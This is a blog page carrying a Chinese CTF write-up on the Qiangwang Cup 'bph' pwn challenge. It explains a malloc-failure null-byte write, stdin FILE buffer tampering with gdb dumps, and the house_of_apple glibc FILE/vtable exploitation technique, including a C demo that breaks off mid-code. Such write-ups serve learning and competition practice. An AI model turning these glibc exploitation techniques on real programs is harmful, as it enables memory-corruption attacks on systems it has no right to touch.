<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#0078E7"><meta name="author" content="py"><meta name="copyright" content="py"><meta name="generator" content="Hexo 7.3.0"><meta name="theme" content="hexo-theme-yun"><title>強網杯復盤 | 我是py</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/star-markdown-css@0.4.1/dist/yun/yun-markdown.min.css"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/prism-theme-vars/base.css"><script src="https://fastly.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>function initScrollReveal() {
  [".post-card",".markdown-body img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
}
document.addEventListener("DOMContentLoaded", initScrollReveal);
document.addEventListener("pjax:success", initScrollReveal);
</script><link rel="icon" type="image/png" href="/favicon/favicon.ico"><link rel="mask-icon" href="/favicon/favicon.ico" color="#0078E7"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><link rel="preconnect" href="https://fastly.jsdelivr.net/npm/" crossorigin><script id="yun-config">
    window.Yun = {}
    window.CONFIG = {"hostname":"juryorca.github.io","root":"/","title":"宇宙终极无敌猫猫虫大王","version":"1.10.11","mode":"auto","copycode":true,"page":{"isPost":true},"i18n":{"placeholder":"搜索...","empty":"找不到您查询的内容: ${query}","hits":"找到 ${hits} 条结果","hits_time":"找到 ${hits} 条结果（用时 ${time} 毫秒）"},"anonymous_image":"https://cdn.yunyoujun.cn/img/avatar/none.jpg","say":{"api":"https://el-bot-api.vercel.app/api/words/young"},"fireworks":{"colors":null},"vendors":{"host":"https://fastly.jsdelivr.net/npm/","darken":"https://fastly.jsdelivr.net/npm/darken@1.5.0"}};
  </script><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script src="/js/hexo-theme-yun.js" type="module"></script><meta name="description" content="关于SHSTK保护目前，雖然許多文章都表示SHSTK技術已經十分完備，但是從linux官方文檔來看，想要实际对于一个程序，启用SHSTK，需要运行程序者主动声明。因此，即使很多elf在checksec下能够检查出来，其实这也只是声明了，此elf具有SHSTK标签，实际启用SHSTK，还需要许多部分同步启用。这就导致，目前可以说，几乎所有赛题，都没有SHSTK。除非有特殊声明。 bph这题的glib">
<meta property="og:type" content="article">
<meta property="og:title" content="強網杯復盤">
<meta property="og:url" content="http://juryorca.github.io/2025/10/21/%E5%BC%B7%E7%B6%B2%E6%9D%AF%E5%BE%A9%E7%9B%A4/index.html">
<meta property="og:site_name" content="我是py">
<meta property="og:description" content="关于SHSTK保护目前，雖然許多文章都表示SHSTK技術已經十分完備，但是從linux官方文檔來看，想要实际对于一个程序，启用SHSTK，需要运行程序者主动声明。因此，即使很多elf在checksec下能够检查出来，其实这也只是声明了，此elf具有SHSTK标签，实际启用SHSTK，还需要许多部分同步启用。这就导致，目前可以说，几乎所有赛题，都没有SHSTK。除非有特殊声明。 bph这题的glib">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2025-10-21T10:37:35.000Z">
<meta property="article:modified_time" content="2025-10-28T10:44:55.478Z">
<meta property="article:author" content="py">
<meta property="article:tag" content="pwn">
<meta name="twitter:card" content="summary"><script>(function() {
  if (CONFIG.mode !== 'auto') return
  const prefersDark = window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches
  const setting = localStorage.getItem('darken-mode') || 'auto'
  if (setting === 'dark' || (prefersDark && setting !== 'light'))
    document.documentElement.classList.toggle('dark', true)
})()</script></head><body><script src="https://code.iconify.design/2/2.1.1/iconify.min.js"></script><script>// Define global variable
IconifyProviders = {
  // Empty prefix: overwrite default API provider configuration
  '': {
    // Use custom API first, use Iconify public API as backup
    resources: [
        'https://api.iconify.design',
    ],
    // Wait for 1 second before switching API hosts
    rotate: 1000,
  },
};</script><script defer src="https://fastly.jsdelivr.net/npm/animejs@latest"></script><script defer src="/js/ui/fireworks.js" type="module"></script><canvas class="fireworks"></canvas><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js" type="module"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="文章目录"><span class="icon iconify" data-icon="ri:list-ordered"></span></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="站点概览"><span class="icon iconify" data-icon="ri:passport-line"></span></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info fix-top"><a class="site-author-avatar" href="/about/" title="py"><img width="96" loading="lazy" src="/images/avatar.jpg" alt="py"></a><div class="site-author-name"><a href="/about/">py</a></div><span class="site-name">我是py</span><sub class="site-subtitle">我是py</sub><div class="site-description">无敌奶龙大王cfy & cgxy和无敌疾旋鼬大王dcm</div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="首页"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:home-4-line"></span></span></a><div class="site-state-item"><a href="/archives/" title="归档"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:archive-line"></span></span><span class="site-state-item-count">16</span></a></div><div class="site-state-item"><a href="/categories/" title="分类"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:folder-2-line"></span></span><span class="site-state-item-count">0</span></a></div><div class="site-state-item"><a href="/tags/" title="标签"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="site-state-item-count">7</span></a></div><a class="site-state-item hty-icon-button" target="_blank" rel="noopener" href="https://yun.yunyoujun.cn" title="文档"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:settings-line"></span></span></a></nav><hr style="margin-bottom:0.5rem"><div class="links-of-author"><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://github.com/Juryorca" title="GitHub" target="_blank" style="color:#8E71C1"><span class="icon iconify" data-icon="ri:github-line"></span></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://www.zhihu.com/people/i-wanna-41-50" title="知乎" target="_blank" style="color:#0084FF"><span class="icon iconify" data-icon="ri:zhihu-line"></span></a></div><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" href="/links/" title="都是大佬stO" style="color:dodgerblue"><span class="icon iconify" data-icon="ri:genderless-line"></span></a></div><br><a class="links-item hty-icon-button" id="toggle-mode-btn" href="javascript:;" title="Mode" style="color: #f1cb64"><span class="icon iconify" data-icon="ri:contrast-2-line"></span></a></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%B3%E4%BA%8ESHSTK%E4%BF%9D%E6%8A%A4"><span class="toc-number">1.</span> <span class="toc-text">关于SHSTK保护</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#bph"><span class="toc-number">2.</span> <span class="toc-text">bph</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#house-of-apple1"><span class="toc-number">2.1.</span> <span class="toc-text">house of apple1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#house-of-apple2"><span class="toc-number">2.2.</span> <span class="toc-text">house_of_apple2</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E9%93%BE"><span class="toc-number">2.2.1.</span> <span class="toc-text">利用链</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#house-of-apple3"><span class="toc-number">2.3.</span> <span class="toc-text">house_of_apple3</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#bph-1"><span class="toc-number">2.4.</span> <span class="toc-text">bph</span></a></li></ol></li></ol></div></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="hty-card post-block" itemscope itemtype="https://schema.org/Article" style="--smc-primary:#0078E7;"><link itemprop="mainEntityOfPage" href="http://Juryorca.github.io/2025/10/21/%E5%BC%B7%E7%B6%B2%E6%9D%AF%E5%BE%A9%E7%9B%A4/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="py"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="我是py"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">強網杯復盤</h1><div class="post-meta"><div class="post-time"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:calendar-line"></span></span> <time title="创建时间：2025-10-21 18:37:35" itemprop="dateCreated datePublished" datetime="2025-10-21T18:37:35+08:00">2025-10-21</time><span class="post-meta-divider">-</span><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:calendar-2-line"></span></span> <time title="修改时间：2025-10-28 18:44:55" itemprop="dateModified" datetime="2025-10-28T18:44:55+08:00">2025-10-28</time></div><div class="post-classify"><span class="post-tag"><a class="tag-item" href="/tags/pwn/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="tag-name">pwn</span></a></span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body"><h2 id="关于SHSTK保护"><a href="#关于SHSTK保护" class="headerlink" title="关于SHSTK保护"></a>关于SHSTK保护</h2><p>目前，雖然許多文章都表示SHSTK技術已經十分完備，但是從linux官方文檔來看，想要实际对于一个程序，启用SHSTK，需要运行程序者主动声明。因此，即使很多elf在checksec下能够检查出来，其实这也只是声明了，此elf具有SHSTK标签，实际启用SHSTK，还需要许多部分同步启用。这就导致，目前可以说，几乎所有赛题，都没有SHSTK。除非有特殊声明。</p>
<h2 id="bph"><a href="#bph" class="headerlink" title="bph"></a>bph</h2><p>这题的glibc非常新，我使用libc_database下到了非常后面的版本，还是没search出来，当时又看到SHSTK，觉得即使知道了libc_database ，在没有ROP的情况下，打orw也很困难，于是有点放弃了。</p>
<p>目前靶机已经关闭，根据 Polaris 战队提供的wp，了解到是使用 ubuntu24.04 搭建。通常对应了glibc2.39。</p>
<p>程序的漏洞非常明显 : 如果malloc失败，malloc实际上返回的是0 , 而之后有个无视malloc是否返回成功，在ptr + size -1 位置写入\x00 的代码。实际上就是给出了任意地址写入\x00</p>
<p>但是目前状态下，没有泄露stack &#x2F; lilbc &#x2F; heap 任何一个部分的base。 </p>
<p>在前面输入token的部分 可以泄露 libc or stack  考虑到写入一个字节是一个非常弱小的primitive，应该是需要扩大写入权限的，如果泄露栈上地址，并且还不知道text 段地址 几乎没任何意义。反而在libc中，由于有stdin的iofile，打IOfile 可能可以扩大写入权限，进行进一步的攻击。</p>
<p>在IO_file 中，存在一个指定缓冲区位置的指针”IO_buf_base”,它指定了一个file的缓冲区的起点。通常，对于一个file，会有个内联的缓冲区short_buf，它是紧跟在IO_file结构体之后的，这也是为什么有时候通过直接泄露stdin里面的内容可以泄露flag,当short_buf 空间不足时(shortbuf只有一个字节大小，也就是说，如果不是0缓冲就不用这个了) 会从heap上申请空间，迁移IO_buf_base 和 IO_buf_end指针，其他像IO_write_base等指针会跟进迁移。</p>
<p>打印一个stdin的 IO_file来看一下</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">pwndbg&gt; p *(FILE *) <span class="number">0x7ffff7f6e8e0</span></span><br><span class="line">$<span class="number">3</span> = &#123;</span><br><span class="line">  _flags = <span class="number">-72540021</span>,</span><br><span class="line">  _IO_read_ptr = <span class="number">0x7ffff7f6e963</span> &lt;_IO_2_1_stdin_+<span class="number">131</span>&gt; <span class="string">&quot;&quot;</span>,</span><br><span class="line">  _IO_read_end = <span class="number">0x7ffff7f6e963</span> &lt;_IO_2_1_stdin_+<span class="number">131</span>&gt; <span class="string">&quot;&quot;</span>,</span><br><span class="line">  _IO_read_base = <span class="number">0x7ffff7f6e963</span> &lt;_IO_2_1_stdin_+<span class="number">131</span>&gt; <span class="string">&quot;&quot;</span>,</span><br><span class="line">  _IO_write_base = <span class="number">0x7ffff7f6e963</span> &lt;_IO_2_1_stdin_+<span class="number">131</span>&gt; <span class="string">&quot;&quot;</span>,</span><br><span class="line">  _IO_write_ptr = <span class="number">0x7ffff7f6e963</span> &lt;_IO_2_1_stdin_+<span class="number">131</span>&gt; <span class="string">&quot;&quot;</span>,</span><br><span class="line">  _IO_write_end = <span class="number">0x7ffff7f6e963</span> &lt;_IO_2_1_stdin_+<span class="number">131</span>&gt; <span class="string">&quot;&quot;</span>,</span><br><span class="line">  _IO_buf_base = <span class="number">0x7ffff7f6e963</span> &lt;_IO_2_1_stdin_+<span class="number">131</span>&gt; <span class="string">&quot;&quot;</span>,</span><br><span class="line">  _IO_buf_end = <span class="number">0x7ffff7f6e964</span> &lt;_IO_2_1_stdin_+<span class="number">132</span>&gt; <span class="string">&quot;&quot;</span>,</span><br><span class="line">  _IO_save_base = <span class="number">0x0</span>,</span><br><span class="line">  _IO_backup_base = <span class="number">0x0</span>,</span><br><span class="line">  _IO_save_end = <span class="number">0x0</span>,</span><br><span class="line">  _markers = <span class="number">0x0</span>,</span><br><span class="line">  _chain = <span class="number">0x0</span>,</span><br><span class="line">  _fileno = <span class="number">0</span>,</span><br><span class="line">  _flags2 = <span class="number">0</span>,</span><br><span class="line">  _old_offset = <span class="number">-1</span>,</span><br><span class="line">  _cur_column = <span class="number">0</span>,</span><br><span class="line">  _vtable_offset = <span class="number">0</span> <span class="string">&#x27;\000&#x27;</span>,</span><br><span class="line">  _shortbuf = <span class="string">&quot;&quot;</span>,</span><br><span class="line">  _lock = <span class="number">0x7ffff7f70720</span> &lt;_IO_stdfile_0_lock&gt;,</span><br><span class="line">  _offset = <span class="number">-1</span>,</span><br><span class="line">  _codecvt = <span class="number">0x0</span>,</span><br><span class="line">  _wide_data = <span class="number">0x7ffff7f6e9c0</span> &lt;_IO_wide_data_0&gt;,</span><br><span class="line">  _freeres_list = <span class="number">0x0</span>,</span><br><span class="line">  _freeres_buf = <span class="number">0x0</span>,</span><br><span class="line">  _prevchain = <span class="number">0x7ffff7f6f628</span> &lt;_IO_2_1_stdout_+<span class="number">104</span>&gt;,</span><br><span class="line">  _mode = <span class="number">0</span>,</span><br><span class="line">  _unused2 = <span class="string">&#x27;\000&#x27;</span> &lt;repeats <span class="number">19</span> times&gt;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这个stdin是从bph 中取出来的</p>
<p>这是还没读取进信息时的stdin</p>
<p>尝试输入token，基本上内容都是一样的，因为此时是0缓冲。</p>
<p>用gdb修改base到stdin起点</p>
<p>调用read 会发现所有write_base read_base 等指针都跟进了</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">pwndbg&gt; p *(FILE *) <span class="number">0x7ffff7f6e8e0</span></span><br><span class="line">$<span class="number">33</span> = &#123;</span><br><span class="line">  _flags = <span class="number">-72540021</span>,</span><br><span class="line">  _IO_read_ptr = <span class="number">0x7ffff7f6e8e0</span> &lt;_IO_2_1_stdin_&gt; <span class="string">&quot;\213 \255&quot;</span>, &lt;incomplete sequence \<span class="number">373</span>&gt;,</span><br><span class="line">  _IO_read_end = <span class="number">0x7ffff7f6e8e0</span> &lt;_IO_2_1_stdin_&gt; <span class="string">&quot;\213 \255&quot;</span>, &lt;incomplete sequence \<span class="number">373</span>&gt;,</span><br><span class="line">  _IO_read_base = <span class="number">0x7ffff7f6e8e0</span> &lt;_IO_2_1_stdin_&gt; <span class="string">&quot;\213 \255&quot;</span>, &lt;incomplete sequence \<span class="number">373</span>&gt;,</span><br><span class="line">  _IO_write_base = <span class="number">0x7ffff7f6e8e0</span> &lt;_IO_2_1_stdin_&gt; <span class="string">&quot;\213 \255&quot;</span>, &lt;incomplete sequence \<span class="number">373</span>&gt;,</span><br><span class="line">  _IO_write_ptr = <span class="number">0x7ffff7f6e8e0</span> &lt;_IO_2_1_stdin_&gt; <span class="string">&quot;\213 \255&quot;</span>, &lt;incomplete sequence \<span class="number">373</span>&gt;,</span><br><span class="line">  _IO_write_end = <span class="number">0x7ffff7f6e8e0</span> &lt;_IO_2_1_stdin_&gt; <span class="string">&quot;\213 \255&quot;</span>, &lt;incomplete sequence \<span class="number">373</span>&gt;,</span><br><span class="line">  _IO_buf_base = <span class="number">0x7ffff7f6e8e0</span> &lt;_IO_2_1_stdin_&gt; <span class="string">&quot;\213 \255&quot;</span>, &lt;incomplete sequence \<span class="number">373</span>&gt;,</span><br><span class="line">  _IO_buf_end = <span class="number">0x7ffff7f6e964</span> &lt;_IO_2_1_stdin_+<span class="number">132</span>&gt; <span class="string">&quot;&quot;</span>,</span><br><span class="line">  _IO_save_base = <span class="number">0x0</span>,</span><br><span class="line">  _IO_backup_base = <span class="number">0x0</span>,</span><br><span class="line">  _IO_save_end = <span class="number">0x0</span>,</span><br><span class="line">  _markers = <span class="number">0x0</span>,</span><br><span class="line">  _chain = <span class="number">0x0</span>,</span><br><span class="line">  _fileno = <span class="number">0</span>,</span><br><span class="line">  _flags2 = <span class="number">0</span>,</span><br><span class="line">  _old_offset = <span class="number">-1</span>,</span><br><span class="line">  _cur_column = <span class="number">0</span>,</span><br><span class="line">  _vtable_offset = <span class="number">0</span> <span class="string">&#x27;\000&#x27;</span>,</span><br><span class="line">  _shortbuf = <span class="string">&quot;&quot;</span>,</span><br><span class="line">  _lock = <span class="number">0x7ffff7f70720</span> &lt;_IO_stdfile_0_lock&gt;,</span><br><span class="line">  _offset = <span class="number">-1</span>,</span><br><span class="line">  _codecvt = <span class="number">0x0</span>,</span><br><span class="line">  _wide_data = <span class="number">0x7ffff7f6e9c0</span> &lt;_IO_wide_data_0&gt;,</span><br><span class="line">  _freeres_list = <span class="number">0x0</span>,</span><br><span class="line">  _freeres_buf = <span class="number">0x0</span>,</span><br><span class="line">  _prevchain = <span class="number">0x7ffff7f6f628</span> &lt;_IO_2_1_stdout_+<span class="number">104</span>&gt;,</span><br><span class="line">  _mode = <span class="number">-1</span>,</span><br><span class="line">  _unused2 = <span class="string">&#x27;\000&#x27;</span> &lt;repeats <span class="number">19</span> times&gt;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>但是并没有看到篡改现象，因为read是非常底层的函数。</p>
<p>再在gdb调用gets(ptr) 随便输入点数据 看看会发生什么</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">pwndbg&gt; x/<span class="number">10</span>gx <span class="number">0x7ffff7f6e8e0</span></span><br><span class="line"><span class="number">0x7ffff7f6e8e0</span> &lt;_IO_2_1_stdin_&gt;:        <span class="number">0x00000a3131313131</span>      <span class="number">0x00007ffff7f6e8e6</span></span><br><span class="line"><span class="number">0x7ffff7f6e8f0</span> &lt;_IO_2_1_stdin_+<span class="number">16</span>&gt;:     <span class="number">0x00007ffff7f6e8e6</span>      <span class="number">0x00007ffff7f6e8e0</span></span><br><span class="line"><span class="number">0x7ffff7f6e900</span> &lt;_IO_2_1_stdin_+<span class="number">32</span>&gt;:     <span class="number">0x00007ffff7f6e8e0</span>      <span class="number">0x00007ffff7f6e8e0</span></span><br><span class="line"><span class="number">0x7ffff7f6e910</span> &lt;_IO_2_1_stdin_+<span class="number">48</span>&gt;:     <span class="number">0x00007ffff7f6e8e0</span>      <span class="number">0x00007ffff7f6e8e0</span></span><br><span class="line"><span class="number">0x7ffff7f6e920</span> &lt;_IO_2_1_stdin_+<span class="number">64</span>&gt;:     <span class="number">0x00007ffff7f6e964</span>      <span class="number">0x0000000000000000</span></span><br></pre></td></tr></table></figure>

<p>篡改出现了。同时 read_ptr read_end  都同步了</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">_IO_read_ptr = <span class="number">0x7ffff7f6e8e6</span> &lt;_IO_2_1_stdin_+<span class="number">6</span>&gt; <span class="string">&quot;&quot;</span>,</span><br><span class="line">_IO_read_end = <span class="number">0x7ffff7f6e8e6</span> &lt;_IO_2_1_stdin_+<span class="number">6</span>&gt; <span class="string">&quot;&quot;</span>,</span><br><span class="line">_IO_read_base = <span class="number">0x7ffff7f6e8e0</span> &lt;_IO_2_1_stdin_&gt; <span class="string">&quot;11111\n&quot;</span>,</span><br></pre></td></tr></table></figure>

<p>这就表示我们可以扩大利用范围了。有控制iofile的权利，通常的思路就是控制vtable，在高版本中，vtable会检查是否在合法的范围内，因此最好是通过调用io有关函数，来控制需要的寄存器。</p>
<p>另外，IOfile攻击，通常需要考虑一两次的利用就达成目的，而题目要求打orw, 通常使用ROP更好，因此需要进行一次栈迁移，这里有个方便的函数: setcontext 。 传入一个sigframe, setcontext 就能控制大部分的寄存器。</p>
<p>polaris的解法基本上就基于上面的思路，利用方式很像house_of_apple</p>
<p>所以下面扩展一下 , house_of_apple 的原型</p>
<h3 id="house-of-apple1"><a href="#house-of-apple1" class="headerlink" title="house of apple1"></a>house of apple1</h3><ol>
<li><p>能从main返回或能exit</p>
</li>
<li><p>heap地址和libc地址泄露</p>
</li>
<li><p>一次largebin attack</p>
</li>
</ol>
<p>fcloseall 利用链:</p>
<p>fcloseall -&gt; 遍历_IO_list_all ,调用vtable-&gt;_overflow。</p>
<p>largebin attack 可以伪造_IO_FILE结构体，apple1在此基础上 通过_wide_data 扩大利用范围。</p>
<p>具体来说 运用到了_IO_wstrn_overflow</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">_IO_wstrn_overflow (FILE *fp, <span class="type">wint_t</span> c)</span><br><span class="line">&#123;</span><br><span class="line">  _IO_wstrnfile *snf = (_IO_wstrnfile *) fp;</span><br><span class="line">  <span class="keyword">if</span> (fp-&gt;_wide_data-&gt;_IO_buf_base != snf-&gt;overflow_buf)</span><br><span class="line">    &#123;</span><br><span class="line">      _IO_wsetb (fp, snf-&gt;overflow_buf,</span><br><span class="line">         snf-&gt;overflow_buf + (<span class="keyword">sizeof</span> (snf-&gt;overflow_buf)</span><br><span class="line">                      / <span class="keyword">sizeof</span> (<span class="type">wchar_t</span>)), <span class="number">0</span>);</span><br><span class="line">      <span class="comment">//只要控制了fp-&gt;_wide_data，就可以控制从fp-&gt;_wide_data开始一定范围内的内存的值，也就等同于任意地址写已知地址。</span></span><br><span class="line">      fp-&gt;_wide_data-&gt;_IO_write_base = snf-&gt;overflow_buf;</span><br><span class="line">      fp-&gt;_wide_data-&gt;_IO_read_base = snf-&gt;overflow_buf;</span><br><span class="line">      fp-&gt;_wide_data-&gt;_IO_read_ptr = snf-&gt;overflow_buf;</span><br><span class="line">      fp-&gt;_wide_data-&gt;_IO_read_end = (snf-&gt;overflow_buf</span><br><span class="line">                      + (<span class="keyword">sizeof</span> (snf-&gt;overflow_buf)</span><br><span class="line">                     / <span class="keyword">sizeof</span> (<span class="type">wchar_t</span>)));</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">  fp-&gt;_wide_data-&gt;_IO_write_ptr = snf-&gt;overflow_buf;</span><br><span class="line">  fp-&gt;_wide_data-&gt;_IO_write_end = snf-&gt;overflow_buf;</span><br><span class="line">  <span class="keyword">return</span> c;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>





<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  <span class="comment">//0xf0</span></span><br><span class="line">  _IO_strfile f;</span><br><span class="line">  <span class="type">wchar_t</span> overflow_buf[<span class="number">64</span>]; <span class="comment">// overflow_buf在这里********</span></span><br><span class="line">&#125; _IO_wstrnfile</span><br></pre></td></tr></table></figure>



<p>从上述部分可以看到 假设有伪造的_IO_file A , 并且里面有伪造的_wide_data字段B , 伪造vtable为_IO_wstrn_jumps  ,  就可以将B 到 B + 0x38 写成 A+0xf0 或 A + 0x1f0  (0x1f0不知道哪来的 但是原博客就是这么写的)</p>
<p>为了绕过free ，还需要设置_flags2字段为8</p>
<p>一个demo </p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdint.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">    setbuf(<span class="built_in">stdout</span>, <span class="number">0</span>);</span><br><span class="line">    setbuf(<span class="built_in">stdin</span>, <span class="number">0</span>);</span><br><span class="line">    setvbuf(<span class="built_in">stderr</span>, <span class="number">0</span>, <span class="number">2</span>, <span class="number">0</span>);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;[*] allocate a 0x100 chunk&quot;</span>);</span><br><span class="line">    <span class="type">size_t</span> *p1 = <span class="built_in">malloc</span>(<span class="number">0xf0</span>);</span><br><span class="line">    <span class="type">size_t</span> *tmp = p1;</span><br><span class="line">    <span class="type">size_t</span> old_value = <span class="number">0x1122334455667788</span>;</span><br><span class="line">    <span class="keyword">for</span> (<span class="type">size_t</span> i = <span class="number">0</span>; i &lt; <span class="number">0x100</span> / <span class="number">8</span>; i++)</span><br><span class="line">    &#123;</span><br><span class="line">        p1[i] = old_value;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;===========================old value=======================&quot;</span>);</span><br><span class="line">    <span class="keyword">for</span> (<span class="type">size_t</span> i = <span class="number">0</span>; i &lt; <span class="number">4</span>; i++)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;[%p]: 0x%016lx  0x%016lx\n&quot;</span>, tmp, tmp[<span class="number">0</span>], tmp[<span class="number">1</span>]);</span><br><span class="line">        tmp += <span class="number">2</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;===========================old value=======================&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="type">size_t</span> puts_addr = (<span class="type">size_t</span>)&amp;<span class="built_in">puts</span>;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[*] puts address: %p\n&quot;</span>, (<span class="type">void</span> *)puts_addr);</span><br><span class="line">    <span class="type">size_t</span> stderr_write_ptr_addr = puts_addr + <span class="number">0x1997b8</span>;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[*] stderr-&gt;_IO_write_ptr address: %p\n&quot;</span>, (<span class="type">void</span> *)stderr_write_ptr_addr);</span><br><span class="line">    <span class="type">size_t</span> stderr_flags2_addr = puts_addr + <span class="number">0x199804</span>;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[*] stderr-&gt;_flags2 address: %p\n&quot;</span>, (<span class="type">void</span> *)stderr_flags2_addr);</span><br><span class="line">    <span class="type">size_t</span> stderr_wide_data_addr = puts_addr + <span class="number">0x199830</span>;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[*] stderr-&gt;_wide_data address: %p\n&quot;</span>, (<span class="type">void</span> *)stderr_wide_data_addr);</span><br><span class="line">    <span class="type">size_t</span> sdterr_vtable_addr = puts_addr + <span class="number">0x199868</span>;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[*] stderr-&gt;vtable address: %p\n&quot;</span>, (<span class="type">void</span> *)sdterr_vtable_addr);</span><br><span class="line">    <span class="type">size_t</span> _IO_wstrn_jumps_addr = puts_addr + <span class="number">0x194ed0</span>;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[*] _IO_wstrn_jumps address: %p\n&quot;</span>, (<span class="type">void</span> *)_IO_wstrn_jumps_addr);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;[+] step 1: change stderr-&gt;_IO_write_ptr to -1&quot;</span>);</span><br><span class="line">    *(<span class="type">size_t</span> *)stderr_write_ptr_addr = (<span class="type">size_t</span>)<span class="number">-1</span>;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;[+] step 2: change stderr-&gt;_flags2 to 8&quot;</span>);</span><br><span class="line">    *(<span class="type">size_t</span> *)stderr_flags2_addr = <span class="number">8</span>;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;[+] step 3: replace stderr-&gt;_wide_data with the allocated chunk&quot;</span>);</span><br><span class="line">    *(<span class="type">size_t</span> *)stderr_wide_data_addr = (<span class="type">size_t</span>)p1;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;[+] step 4: replace stderr-&gt;vtable with _IO_wstrn_jumps&quot;</span>);</span><br><span class="line">    *(<span class="type">size_t</span> *)sdterr_vtable_addr = (<span class="type">size_t</span>)_IO_wstrn_jumps_addr;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;[+] step 5: call fcloseall and trigger house of apple&quot;</span>);</span><br><span class="line">    fcloseall();</span><br><span class="line">    tmp = p1;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;===========================new value=======================&quot;</span>);</span><br><span class="line">    <span 